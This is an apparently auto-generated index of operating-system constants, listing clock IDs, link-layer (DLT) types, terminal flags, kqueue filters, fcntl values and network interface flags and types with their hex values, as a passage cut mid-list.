CLOCK_MONOTONIC_FAST (line 153) | CLOCK_MONOTONIC_FAST = 0xc constant CLOCK_MONOTONIC_PRECISE (line 154) | CLOCK_MONOTONIC_PRECISE = 0xb constant CLOCK_PROCESS_CPUTIME_ID (line 155) | CLOCK_PROCESS_CPUTIME_ID = 0xf constant CLOCK_PROF (line 156) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 157) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_FAST (line 158) | CLOCK_REALTIME_FAST = 0xa constant CLOCK_REALTIME_PRECISE (line 159) | CLOCK_REALTIME_PRECISE = 0x9 constant CLOCK_SECOND (line 160) | CLOCK_SECOND = 0xd constant CLOCK_THREAD_CPUTIME_ID (line 161) | CLOCK_THREAD_CPUTIME_ID = 0xe constant CLOCK_UPTIME (line 162) | CLOCK_UPTIME = 0x5 constant CLOCK_UPTIME_FAST (line 163) | CLOCK_UPTIME_FAST = 0x8 constant CLOCK_UPTIME_PRECISE (line 164) | CLOCK_UPTIME_PRECISE = 0x7 constant CLOCK_VIRTUAL (line 165) | CLOCK_VIRTUAL = 0x1 constant CPUSTATES (line 166) | CPUSTATES = 0x5 constant CP_IDLE (line 167) | CP_IDLE = 0x4 constant CP_INTR (line 168) | CP_INTR = 0x3 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SYS (line 170) | CP_SYS = 0x2 constant CP_USER (line 171) | CP_USER = 0x0 constant CREAD (line 172) | CREAD = 0x800 constant CRTSCTS (line 173) | CRTSCTS = 0x30000 constant CS5 (line 174) | CS5 = 0x0 constant CS6 (line 175) | CS6 = 0x100 constant CS7 (line 176) | CS7 = 0x200 constant CS8 (line 177) | CS8 = 0x300 constant CSIZE (line 178) | CSIZE = 0x300 constant CSTART (line 179) | CSTART = 0x11 constant CSTATUS (line 180) | CSTATUS = 0x14 constant CSTOP (line 181) | CSTOP = 0x13 constant CSTOPB (line 182) | CSTOPB = 0x400 constant CSUSP (line 183) | CSUSP = 0x1a constant CTL_HW (line 184) | CTL_HW = 0x6 constant CTL_KERN (line 185) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 186) | CTL_MAXNAME = 0xc constant CTL_NET (line 187) | CTL_NET = 0x4 constant DLT_A429 (line 188) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 189) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 190) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 191) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 192) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 193) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 194) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 195) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 196) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 197) | DLT_AURORA = 0x7e constant DLT_AX25 (line 198) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 199) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 200) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_BREDR_BB (line 201) | DLT_BLUETOOTH_BREDR_BB = 0xff constant DLT_BLUETOOTH_HCI_H4 (line 202) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 203) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_BLUETOOTH_LE_LL (line 204) | DLT_BLUETOOTH_LE_LL = 0xfb constant DLT_BLUETOOTH_LE_LL_WITH_PHDR (line 205) | DLT_BLUETOOTH_LE_LL_WITH_PHDR = 0x100 constant DLT_BLUETOOTH_LINUX_MONITOR (line 206) | DLT_BLUETOOTH_LINUX_MONITOR = 0xfe constant DLT_CAN20B (line 207) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 208) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 209) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 210) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 211) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 212) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 213) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 214) | DLT_DBUS = 0xe7 constant DLT_DECT (line 215) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 216) | DLT_DOCSIS = 0x8f constant DLT_DVB_CI (line 217) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 218) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 219) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 220) | DLT_EN3MB = 0x2 constant DLT_ENC (line 221) | DLT_ENC = 0x6d constant DLT_EPON (line 222) | DLT_EPON = 0x103 constant DLT_ERF (line 223) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 224) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 225) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 226) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 227) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 228) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 229) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 230) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 231) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 232) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 233) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 234) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 235) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 236) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 237) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 238) | DLT_GSMTAP_UM = 0xd9 constant DLT_HHDLC (line 239) | DLT_HHDLC = 0x79 constant DLT_IBM_SN (line 240) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 241) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 242) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 243) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 244) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 245) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 246) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 247) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 248) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 249) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 250) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 251) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_INFINIBAND (line 252) | DLT_INFINIBAND = 0xf7 constant DLT_IPFILTER (line 253) | DLT_IPFILTER = 0x74 constant DLT_IPMB (line 254) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 255) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPMI_HPM_2 (line 256) | DLT_IPMI_HPM_2 = 0x104 constant DLT_IPNET (line 257) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 258) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 259) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 260) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 261) | DLT_IP_OVER_FC = 0x7a constant DLT_ISO_14443 (line 262) | DLT_ISO_14443 = 0x108 constant DLT_JUNIPER_ATM1 (line 263) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 264) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 265) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 266) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 267) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 268) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 269) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 270) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 271) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 272) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 273) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 274) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 275) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 276) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 277) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 278) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 279) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 280) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 281) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 282) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 283) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 284) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 285) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 286) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 287) | DLT_LAPD = 0xcb constant DLT_LIN (line 288) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 289) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 290) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 291) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_SLL (line 292) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 293) | DLT_LOOP = 0x6c constant DLT_LTALK (line 294) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 295) | DLT_MATCHING_MAX = 0x109 constant DLT_MATCHING_MIN (line 296) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 297) | DLT_MFR = 0xb6 constant DLT_MOST (line 298) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 299) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 300) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 301) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 302) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 303) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 304) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 305) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 306) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NETLINK (line 307) | DLT_NETLINK = 0xfd constant DLT_NFC_LLCP (line 308) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 309) | DLT_NFLOG = 0xef constant DLT_NG40 (line 310) | DLT_NG40 = 0xf4 constant DLT_NULL (line 311) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 312) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 313) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 314) | DLT_PFSYNC = 0x12 constant DLT_PKTAP (line 315) | DLT_PKTAP = 0x102 constant DLT_PPI (line 316) | DLT_PPI = 0xc0 constant DLT_PPP (line 317) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 318) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 319) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 320) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 321) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 322) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PRISM_HEADER (line 323) | DLT_PRISM_HEADER = 0x77 constant DLT_PROFIBUS_DL (line 324) | DLT_PROFIBUS_DL = 0x101 constant DLT_PRONET (line 325) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 326) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 327) | DLT_RAW = 0xc constant DLT_RDS (line 328) | DLT_RDS = 0x109 constant DLT_REDBACK_SMARTEDGE (line 329) | DLT_REDBACK_SMARTEDGE = 0x20 constant DLT_RIO (line 330) | DLT_RIO = 0x7c constant DLT_RTAC_SERIAL (line 331) | DLT_RTAC_SERIAL = 0xfa constant DLT_SCCP (line 332) | DLT_SCCP = 0x8e constant DLT_SCTP (line 333) | DLT_SCTP = 0xf8 constant DLT_SITA (line 334) | DLT_SITA = 0xc4 constant DLT_SLIP (line 335) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 336) | DLT_SLIP_BSDOS = 0xf constant DLT_STANAG_5066_D_PDU (line 337) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 338) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 339) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 340) | DLT_TZSP = 0x80 constant DLT_USB (line 341) | DLT_USB = 0xba constant DLT_USBPCAP (line 342) | DLT_USBPCAP = 0xf9 constant DLT_USB_FREEBSD (line 343) | DLT_USB_FREEBSD = 0xba constant DLT_USB_LINUX (line 344) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 345) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 346) | DLT_USER0 = 0x93 constant DLT_USER1 (line 347) | DLT_USER1 = 0x94 constant DLT_USER10 (line 348) | DLT_USER10 = 0x9d constant DLT_USER11 (line 349) | DLT_USER11 = 0x9e constant DLT_USER12 (line 350) | DLT_USER12 = 0x9f constant DLT_USER13 (line 351) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 352) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 353) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 354) | DLT_USER2 = 0x95 constant DLT_USER3 (line 355) | DLT_USER3 = 0x96 constant DLT_USER4 (line 356) | DLT_USER4 = 0x97 constant DLT_USER5 (line 357) | DLT_USER5 = 0x98 constant DLT_USER6 (line 358) | DLT_USER6 = 0x99 constant DLT_USER7 (line 359) | DLT_USER7 = 0x9a constant DLT_USER8 (line 360) | DLT_USER8 = 0x9b constant DLT_USER9 (line 361) | DLT_USER9 = 0x9c constant DLT_WATTSTOPPER_DLM (line 362) | DLT_WATTSTOPPER_DLM = 0x107 constant DLT_WIHART (line 363) | DLT_WIHART = 0xdf constant DLT_WIRESHARK_UPPER_PDU (line 364) | DLT_WIRESHARK_UPPER_PDU = 0xfc constant DLT_X2E_SERIAL (line 365) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 366) | DLT_X2E_XORAYA = 0xd6 constant DLT_ZWAVE_R1_R2 (line 367) | DLT_ZWAVE_R1_R2 = 0x105 constant DLT_ZWAVE_R3 (line 368) | DLT_ZWAVE_R3 = 0x106 constant DT_BLK (line 369) | DT_BLK = 0x6 constant DT_CHR (line 370) | DT_CHR = 0x2 constant DT_DBF (line 371) | DT_DBF = 0xf constant DT_DIR (line 372) | DT_DIR = 0x4 constant DT_FIFO (line 373) | DT_FIFO = 0x1 constant DT_LNK (line 374) | DT_LNK = 0xa constant DT_REG (line 375) | DT_REG = 0x8 constant DT_SOCK (line 376) | DT_SOCK = 0xc constant DT_UNKNOWN (line 377) | DT_UNKNOWN = 0x0 constant DT_WHT (line 378) | DT_WHT = 0xe constant ECHO (line 379) | ECHO = 0x8 constant ECHOCTL (line 380) | ECHOCTL = 0x40 constant ECHOE (line 381) | ECHOE = 0x2 constant ECHOK (line 382) | ECHOK = 0x4 constant ECHOKE (line 383) | ECHOKE = 0x1 constant ECHONL (line 384) | ECHONL = 0x10 constant ECHOPRT (line 385) | ECHOPRT = 0x20 constant EVFILT_AIO (line 386) | EVFILT_AIO = -0x3 constant EVFILT_EXCEPT (line 387) | EVFILT_EXCEPT = -0x8 constant EVFILT_FS (line 388) | EVFILT_FS = -0xa constant EVFILT_MARKER (line 389) | EVFILT_MARKER = 0xf constant EVFILT_PROC (line 390) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 391) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 392) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 393) | EVFILT_SYSCOUNT = 0xa constant EVFILT_TIMER (line 394) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 395) | EVFILT_USER = -0x9 constant EVFILT_VNODE (line 396) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 397) | EVFILT_WRITE = -0x2 constant EV_ADD (line 398) | EV_ADD = 0x1 constant EV_CLEAR (line 399) | EV_CLEAR = 0x20 constant EV_DELETE (line 400) | EV_DELETE = 0x2 constant EV_DISABLE (line 401) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 402) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 403) | EV_ENABLE = 0x4 constant EV_EOF (line 404) | EV_EOF = 0x8000 constant EV_ERROR (line 405) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 406) | EV_FLAG1 = 0x2000 constant EV_HUP (line 407) | EV_HUP = 0x800 constant EV_NODATA (line 408) | EV_NODATA = 0x1000 constant EV_ONESHOT (line 409) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 410) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 411) | EV_SYSFLAGS = 0xf800 constant EXTA (line 412) | EXTA = 0x4b00 constant EXTB (line 413) | EXTB = 0x9600 constant EXTEXIT_LWP (line 414) | EXTEXIT_LWP = 0x10000 constant EXTEXIT_PROC (line 415) | EXTEXIT_PROC = 0x0 constant EXTEXIT_SETINT (line 416) | EXTEXIT_SETINT = 0x1 constant EXTEXIT_SIMPLE (line 417) | EXTEXIT_SIMPLE = 0x0 constant EXTPROC (line 418) | EXTPROC = 0x800 constant FD_CLOEXEC (line 419) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 420) | FD_SETSIZE = 0x400 constant FLUSHO (line 421) | FLUSHO = 0x800000 constant F_DUP2FD (line 422) | F_DUP2FD = 0xa constant F_DUP2FD_CLOEXEC (line 423) | F_DUP2FD_CLOEXEC = 0x12 constant F_DUPFD (line 424) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 425) | F_DUPFD_CLOEXEC = 0x11 constant F_GETFD (line 426) | F_GETFD = 0x1 constant F_GETFL (line 427) | F_GETFL = 0x3 constant F_GETLK (line 428) | F_GETLK = 0x7 constant F_GETOWN (line 429) | F_GETOWN = 0x5 constant F_OK (line 430) | F_OK = 0x0 constant F_RDLCK (line 431) | F_RDLCK = 0x1 constant F_SETFD (line 432) | F_SETFD = 0x2 constant F_SETFL (line 433) | F_SETFL = 0x4 constant F_SETLK (line 434) | F_SETLK = 0x8 constant F_SETLKW (line 435) | F_SETLKW = 0x9 constant F_SETOWN (line 436) | F_SETOWN = 0x6 constant F_UNLCK (line 437) | F_UNLCK = 0x2 constant F_WRLCK (line 438) | F_WRLCK = 0x3 constant HUPCL (line 439) | HUPCL = 0x4000 constant HW_MACHINE (line 440) | HW_MACHINE = 0x1 constant ICANON (line 441) | ICANON = 0x100 constant ICMP6_FILTER (line 442) | ICMP6_FILTER = 0x12 constant ICRNL (line 443) | ICRNL = 0x100 constant IEXTEN (line 444) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 445) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 446) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 447) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 448) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 449) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 450) | IFF_CANTCHANGE = 0x318e72 constant IFF_DEBUG (line 451) | IFF_DEBUG = 0x4 constant IFF_IDIRECT (line 452) | IFF_IDIRECT = 0x200000 constant IFF_LINK0 (line 453) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 454) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 455) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 456) | IFF_LOOPBACK = 0x8 constant IFF_MONITOR (line 457) | IFF_MONITOR = 0x40000 constant IFF_MULTICAST (line 458) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 459) | IFF_NOARP = 0x80 constant IFF_NPOLLING (line 460) | IFF_NPOLLING = 0x100000 constant IFF_OACTIVE (line 461) | IFF_OACTIVE = 0x400 constant IFF_OACTIVE_COMPAT (line 462) | IFF_OACTIVE_COMPAT = 0x400 constant IFF_POINTOPOINT (line 463) | IFF_POINTOPOINT = 0x10 constant IFF_POLLING (line 464) | IFF_POLLING = 0x10000 constant IFF_POLLING_COMPAT (line 465) | IFF_POLLING_COMPAT = 0x10000 constant IFF_PPROMISC (line 466) | IFF_PPROMISC = 0x20000 constant IFF_PROMISC (line 467) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 468) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 469) | IFF_SIMPLEX = 0x800 constant IFF_SMART (line 470) | IFF_SMART = 0x20 constant IFF_STATICARP (line 471) | IFF_STATICARP = 0x80000 constant IFF_UP (line 472) | IFF_UP = 0x1 constant IFNAMSIZ (line 473) | IFNAMSIZ = 0x10 constant IFT_1822 (line 474) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 475) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 476) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 477) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 478) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 479) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 480) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 481) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 482) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 483) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 484) | IFT_ASYNC = 0x54 constant IFT_ATM (line 485) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 486) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 487) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 488) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 489) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 490) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 491) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 492) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 493) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 494) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BRIDGE (line 495) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 496) | IFT_BSC = 0x53 constant IFT_CARP (line 497) | IFT_CARP = 0xf8 constant IFT_CCTEMUL (line 498) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 499) | IFT_CEPT = 0x13 constant IFT_CES (line 500) | IFT_CES = 0x85 constant IFT_CHANNEL (line 501) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 502) | IFT_CNR = 0x55 constant IFT_COFFEE (line 503) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 504) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 505) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 506) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 507) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 508) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 509) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 510) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 511) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DS0 (line 512) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 513) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 514) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 515) | IFT_DS3 = 0x1e constant IFT_DTM (line 516) | IFT_DTM = 0x8c constant IFT_DVBASILN (line 517) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 518) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 519) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 520) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 521) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ENC (line 522) | IFT_ENC = 0xf4 constant IFT_EON (line 523) | IFT_EON = 0x19 constant IFT_EPLRS (line 524) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 525) | IFT_ESCON = 0x49 constant IFT_ETHER (line 526) | IFT_ETHER = 0x6 constant IFT_FAST (line 527) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 528) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 529) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 530) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 531) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 532) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 533) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 534) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 535) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 536) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 537) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 538) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 539) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 540) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 541) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 542) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 543) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 544) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 545) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 546) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 547) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 548) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 549) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 550) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 551) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 552) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 553) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 554) | IFT_HSSI = 0x2e constant IFT_HY (line 555) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 556) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 557) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 558) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 559) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 560) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 561) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 562) | IFT_IFGSN = 0x91 constant IFT_IMT (line 563) | IFT_IMT = 0xbe constant IFT_INTERLEAVE (line 564) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 565) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 566) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 567) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 568) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 569) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 570) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 571) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 572) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 573) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS 